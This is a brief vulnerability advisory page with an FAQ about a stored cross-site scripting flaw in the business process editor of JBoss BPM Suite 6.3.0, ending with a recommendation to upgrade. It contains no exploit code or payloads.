REDHAT-BUG-1358523: XSS
JBoss BPM Suite 6.3.0 is vulnerable to a stored XSS via business process editor. Remote authenticated attackers that have privileges to create business processes can store scripts in them, which are not properly sanitized before showing to other users, including admins.
Affected Software
Event History
Frequently Asked Questions
What is the severity of REDHAT-BUG-1358523?
The severity of REDHAT-BUG-1358523 is classified as medium due to the potential for stored XSS attacks.
Who is affected by the vulnerability REDHAT-BUG-1358523?
Users of JBoss BPM Suite 6.3.0 who have permissions to create business processes are affected by REDHAT-BUG-1358523.
How do I fix REDHAT-BUG-1358523?
To fix REDHAT-BUG-1358523, it is recommended to upgrade JBoss BPM Suite to a version that addresses this vulnerability.
What type of attack does REDHAT-BUG-1358523 enable?
REDHAT-BUG-1358523 enables a stored cross-site scripting (XSS) attack.
What can attackers do with the vulnerability REDHAT-BUG-1358523?
Attackers exploiting REDHAT-BUG-1358523 can store malicious scripts within business processes, affecting all users who access them.